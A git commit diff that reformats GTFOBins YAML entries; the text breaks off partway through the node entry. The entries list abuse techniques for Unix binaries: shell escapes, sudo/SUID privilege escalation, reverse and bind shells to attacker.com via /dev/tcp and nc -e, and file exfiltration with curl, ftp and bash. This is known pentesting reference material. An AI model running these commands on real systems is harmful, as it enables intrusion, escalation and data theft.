Fix YAMLs according to YAMLlint

This commit is contained in:
Andrea Cardaci 2018-07-16 15:01:50 +02:00
parent 785126ede0
commit e1cd3aed68
87 changed files with 996 additions and 1061 deletions

3
.yamllint Normal file
View File

@ -0,0 +1,3 @@
extends: default
rules:
line-length: disable

View File

@ -1,4 +1,4 @@
.PHONY: serve serve-public bundle
.PHONY: serve serve-public bundle lint
serve:
bundle exec jekyll serve
@ -8,3 +8,6 @@ serve-public:
bundle:
bundle install
lint:
yamllint . _gtfobins/*.md

View File

@ -1,3 +1,4 @@
---
title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']

View File

@ -1,3 +1,4 @@
---
execute-interactive:
label: Interactive execute
description: |

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- code: ash
- code: ash
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo data > $LFILE'
- code: |
export LFILE=file_to_write
ash -c 'echo data > $LFILE'
suid-enabled:
- code: "./ash"
- code: "./ash"
sudo-enabled:
- code: sudo ash
- code: sudo ash
---

View File

@ -1,34 +1,34 @@
---
functions:
execute-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
- code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
file-write:
- code: |
LFILE=file_to_write
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
- code: |
LFILE=file_to_write
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
file-read:
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
- code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh")}'
- code: ./awk 'BEGIN {system("/bin/sh")}'
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
base64 "$LFILE" | base64 --decode
- code: |
LFILE=file_to_read
base64 "$LFILE" | base64 --decode
suid-enabled:
- code: |
LFILE=file_to_read
./base64 "$LFILE" | base64 --decode
- code: |
LFILE=file_to_read
./base64 "$LFILE" | base64 --decode
sudo-enabled:
- code: |
LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode
- code: |
LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode
---

View File

@ -1,55 +1,52 @@
---
functions:
execute-interactive:
- code: bash
- code: bash
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP
service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
on the attacker box to send the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write:
- code: |
export LFILE=file_to_write
bash -c 'echo data > $LFILE'
- code: |
export LFILE=file_to_write
bash -c 'echo data > $LFILE'
file-read:
- description: It trims trailing newlines and it's not binary-safe.
code: |
export LFILE=file_to_read
bash -c 'echo "$(<$LFILE)"'
- description: It trims trailing newlines and it's not binary-safe.
code: |
export LFILE=file_to_read
bash -c 'echo "$(<$LFILE)"'
suid-enabled:
- code: "./bash -p"
- code: "./bash -p"
sudo-enabled:
- code: sudo bash
- code: sudo bash
---

View File

@ -1,27 +1,25 @@
---
description: |
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example.
functions:
execute-interactive:
- code: busybox sh
- code: busybox sh
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=12345
busybox httpd -f -p $LPORT -h .
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=12345
busybox httpd -f -p $LPORT -h .
file-write:
- code: |
LFILE=file_to_write
busybox sh -c 'echo "data" > $LFILE'
- code: |
LFILE=file_to_write
busybox sh -c 'echo "data" > $LFILE'
file-read:
- code: |
LFILE=file_to_read
./busybox cat "$LFILE"
- code: |
LFILE=file_to_read
./busybox cat "$LFILE"
suid-enabled:
- description: It may drop the SUID privileges depending on the compilation flags
and the runtime configuration.
code: "./busybox sh"
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh"
sudo-enabled:
- code: sudo busybox sh
- code: sudo busybox sh
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
cat "$LFILE"
- code: |
LFILE=file_to_read
cat "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./cat "$LFILE"
- code: |
LFILE=file_to_read
./cat "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo cat "$LFILE"
- code: |
LFILE=file_to_read
sudo cat "$LFILE"
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-non-interactive:
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e
sudo-enabled:
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e
---

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- code: csh
- code: csh
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo data > $LFILE'
- code: |
export LFILE=file_to_write
ash -c 'echo data > $LFILE'
suid-enabled:
- code: "./csh -b"
- code: "./csh -b"
sudo-enabled:
- code: sudo csh
- code: sudo csh
---

View File

@ -1,21 +1,20 @@
---
functions:
upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on
the attacker box to collect the file.
code: |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
file-read:
- description: The file path must be absolute.
code: |
LFILE=/tmp/file_to_read
curl file://$LFILE
- description: The file path must be absolute.
code: |
LFILE=/tmp/file_to_read
curl file://$LFILE
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
cut -d "" -f1 "$LFILE"
- code: |
LFILE=file_to_read
cut -d "" -f1 "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./cut -d "" -f1 "$LFILE"
- code: |
LFILE=file_to_read
./cut -d "" -f1 "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE"
- code: |
LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE"
---

View File

@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- code: dash
- code: dash
file-write:
- code: |
export LFILE=file_to_write
ash -c 'echo data > $LFILE'
- code: |
export LFILE=file_to_write
ash -c 'echo data > $LFILE'
suid-enabled:
- code: "./dash -p"
- code: ./dash -p
sudo-enabled:
- code: sudo dash
- code: sudo dash
---

View File

@ -1,11 +1,11 @@
---
functions:
file-write:
- code: |
LFILE=file_to_write
echo "data" | dd of=$LFILE
- code: |
LFILE=file_to_write
echo "data" | dd of=$LFILE
file-read:
- code: |
LFILE=file_to_read
dd if=LFILE
- code: |
LFILE=file_to_read
dd if=LFILE
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE
- code: |
LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE
suid-enabled:
- code: |
LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE
- code: |
LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE
sudo-enabled:
- code: |
LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE
- code: |
LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE
---

View File

@ -1,23 +1,21 @@
---
functions:
execute-interactive:
- code: |
ed
!/bin/sh
- code: |
ed
!/bin/sh
file-write:
- code: |
ed file_to_write
w
- code: |
ed file_to_write
w
file-read:
- code: 'ed file_to_read
'
- code: ed file_to_read
sudo-enabled:
- code: |
sudo ed
!/bin/sh
- code: |
sudo ed
!/bin/sh
suid-limited:
- code: |
./ed
!/bin/sh
- code: |
./ed
!/bin/sh
---

View File

@ -1,17 +1,15 @@
---
functions:
execute-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
- code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write:
- code: |
emacs file_to_write
C-x C-s
- code: |
emacs file_to_write
C-x C-s
file-read:
- code: 'emacs file_to_read
'
- code: emacs file_to_read
suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: env /bin/sh
- code: env /bin/sh
suid-enabled:
- code: "./env /bin/sh -p"
- code: ./env /bin/sh -p
sudo-enabled:
- code: sudo env /bin/sh
- code: sudo env /bin/sh
---

View File

@ -1,18 +1,16 @@
---
description: 'The read file content is corrupted by replacing tabs with spaces.
'
description: The read file content is corrupted by replacing tabs with spaces.
functions:
file-read:
- code: |
LFILE=file_to_read
expand "$LFILE"
- code: |
LFILE=file_to_read
expand "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./expand "$LFILE"
- code: |
LFILE=file_to_read
./expand "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo expand "$LFILE"
- code: |
LFILE=file_to_read
sudo expand "$LFILE"
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: expect -c 'spawn /bin/sh;interact'
- code: expect -c 'spawn /bin/sh;interact'
suid-enabled:
- code: "./expect -c 'spawn /bin/sh -p;interact'"
- code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'
- code: sudo expect -c 'spawn /bin/sh;interact'
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: find . -exec /bin/sh \; -quit
- code: find . -exec /bin/sh \; -quit
suid-enabled:
- code: "./find . -exec /bin/sh -p \\; -quit"
- code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit
- code: sudo find . -exec /bin/sh \; -quit
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: flock -u / /bin/sh
- code: flock -u / /bin/sh
suid-enabled:
- code: "./flock -u / /bin/sh -p"
- code: ./flock -u / /bin/sh -p
sudo-enabled:
- code: sudo flock -u / /bin/sh
- code: sudo flock -u / /bin/sh
---

View File

@ -1,18 +1,16 @@
---
description: 'The read file content is not binary-safe.
'
description: The read file content is not binary-safe.
functions:
file-read:
- code: |
LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE"
- code: |
LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE"
- code: |
LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
- code: |
LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
fold -w99999999 "$LFILE"
- code: |
LFILE=file_to_read
fold -w99999999 "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./fold -w99999999 "$LFILE"
- code: |
LFILE=file_to_read
./fold -w99999999 "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo fold -w99999999 "$LFILE"
- code: |
LFILE=file_to_read
sudo fold -w99999999 "$LFILE"
---

View File

@ -1,23 +1,23 @@
---
functions:
execute-interactive:
- code: |
ftp
!/bin/sh
- code: |
ftp
!/bin/sh
upload:
- description: Send local file to a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
put file_to_send
- description: Send local file to a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
get file_to_get
- description: Fetch a remote file from a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
get file_to_get
sudo-enabled:
- code: |
sudo ftp
!/bin/sh
- code: |
sudo ftp
!/bin/sh
---

View File

@ -7,11 +7,11 @@ description: |
[version 3](/gtfobins/python3/).
functions:
execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit
- code: gdb -nx -ex '!sh' -ex quit
file-write:
- code: |
LFILE=file_to_write
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
- code: |
LFILE=file_to_write
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit
- code: sudo gdb -nx -ex '!sh' -ex quit
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
head -c1G "$LFILE"
- code: |
LFILE=file_to_read
head -c1G "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./head -c1G "$LFILE"
- code: |
LFILE=file_to_read
./head -c1G "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo head -c1G "$LFILE"
- code: |
LFILE=file_to_read
sudo head -c1G "$LFILE"
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: ionice /bin/sh
- code: ionice /bin/sh
suid-enabled:
- code: "./ionice /bin/sh -p"
- code: ./ionice /bin/sh -p
sudo-enabled:
- code: sudo ionice /bin/sh
- code: sudo ionice /bin/sh
---

View File

@ -1,15 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
jq -Rr . "$LFILE"
- code: |
LFILE=file_to_read
jq -Rr . "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./jq -Rr . "$LFILE"
- code: |
LFILE=file_to_read
./jq -Rr . "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo jq -Rr . "$LFILE"
- code: |
LFILE=file_to_read
sudo jq -Rr . "$LFILE"
---

View File

@ -1,59 +1,56 @@
---
functions:
execute-interactive:
- code: ksh
- code: ksh
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP
service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
on the attacker box to send the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write:
- code: |
export LFILE=file_to_write
ksh -c 'echo data > $LFILE'
- code: |
export LFILE=file_to_write
ksh -c 'echo data > $LFILE'
file-read:
- description: It trims trailing newlines.
code: |
export LFILE=file_to_read
ksh -c 'echo "$(<$LFILE)"'
- description: It trims trailing newlines.
code: |
export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
- description: It trims trailing newlines.
code: |
export LFILE=file_to_read
ksh -c 'echo "$(<$LFILE)"'
- description: It trims trailing newlines.
code: |
export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled:
- code: "./ksh -p"
- code: ./ksh -p
sudo-enabled:
- code: sudo ksh
- code: sudo ksh
---

View File

@ -9,9 +9,9 @@ description: |
```
functions:
execute-interactive:
- code: "/lib/ld.so /bin/sh"
- code: /lib/ld.so /bin/sh
suid-enabled:
- code: "./ld.so /bin/sh -p"
- code: ./ld.so /bin/sh -p
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh
- code: sudo /lib/ld.so /bin/sh
---

View File

@ -1,22 +1,20 @@
---
functions:
execute-interactive:
- code: |
less /etc/profile
!/bin/sh
- code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
- code: |
less /etc/profile
!/bin/sh
- code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
file-read:
- code: 'less file_to_read
'
- code: less file_to_read
sudo-enabled:
- code: |
sudo less /etc/profile
!/bin/sh
- code: |
sudo less /etc/profile
!/bin/sh
suid-limited:
- code: |
./less /etc/profile
!/bin/sh
- code: |
./less /etc/profile
!/bin/sh
---

View File

@ -1,7 +1,7 @@
---
functions:
execute-interactive:
- code: ltrace -b -L /bin/sh
- code: ltrace -b -L /bin/sh
sudo-enabled:
- code: sudo ltrace -b -L /bin/sh
- code: sudo ltrace -b -L /bin/sh
---

View File

@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
mail -f $TF
!/bin/sh
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
mail -f $TF
!/bin/sh
sudo-enabled:
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
sudo mail -f $TF
!/bin/sh
- description: This creates a valid Mbox file which may be required by the binary.
code: |
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
sudo mail -f $TF
!/bin/sh
---

View File

@ -1,24 +1,21 @@
---
description: |
All these examples only work with GNU `make` due to the lack of support of the
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
passing the content via stdin using `-f -`.
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
functions:
execute-interactive:
- code: |
COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND"
- code: |
COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND"
file-write:
- description: Requires a newer GNU `make` version.
code: |
LFILE=file_to_write
make -s --eval="\$(file >$LFILE,data)" .
- description: Requires a newer GNU `make` version.
code: |
LFILE=file_to_write
make -s --eval="\$(file >$LFILE,data)" .
suid-enabled:
- code: |
COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND"
- code: |
COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled:
- code: |
COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
- code: |
COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
---

View File

@ -1,19 +1,17 @@
---
functions:
execute-interactive:
- code: |
man man
!/bin/sh
- code: |
man man
!/bin/sh
file-read:
- code: 'man file_to_read
'
- code: man file_to_read
sudo-enabled:
- code: |
sudo man man
!/bin/sh
- code: |
sudo man man
!/bin/sh
suid-limited:
- code: |
./man man
!/bin/sh
- code: |
./man man
!/bin/sh
---

View File

@ -1,17 +1,15 @@
---
functions:
execute-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh
- code: |
TERM= more /etc/profile
!/bin/sh
file-read:
- code: 'more file_to_read
'
- code: more file_to_read
suid-enabled:
- code: "./more file_to_read\n"
- code: "./more file_to_read\n"
sudo-enabled:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh
---

View File

@ -1,8 +1,8 @@
---
functions:
sudo-enabled:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: |
sudo mount -o bind /bin/sh /bin/mount
sudo mount
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: |
sudo mount -o bind /bin/sh /bin/mount
sudo mount
---

View File

@ -1,38 +1,36 @@
---
functions:
execute-non-interactive:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
nano -s $TF /etc/hosts
^T
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
nano -s $TF /etc/hosts
^T
file-write:
- code: |
nano file_to_write
^O
- code: |
nano file_to_write
^O
file-read:
- code: 'nano file_to_read
'
- code: nano file_to_read
suid-enabled:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF
./nano -s $TF /etc/hosts
^T
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF
./nano -s $TF /etc/hosts
^T
sudo-enabled:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo nano -s $TF /etc/hosts
^T
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo nano -s $TF /etc/hosts
^T
---

View File

@ -1,29 +1,27 @@
---
functions:
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
nc -l -p $LPORT -e /bin/sh
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
nc -l -p $LPORT -e /bin/sh
upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file.
code: |
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: |
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
---

View File

@ -1,19 +1,16 @@
---
description: 'The read file content is corrupted by a leading space added to each
line.
'
description: The read file content is corrupted by a leading space added to each line.
functions:
file-read:
- code: |
LFILE=file_to_read
nl -bn -w1 -s '' $LFILE
- code: |
LFILE=file_to_read
nl -bn -w1 -s '' $LFILE
suid-enabled:
- code: |
LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE
- code: |
LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE
sudo-enabled:
- code: |
LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE
- code: |
LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE
---

View File

@ -1,38 +1,33 @@
---
functions:
execute-interactive:
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
'
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
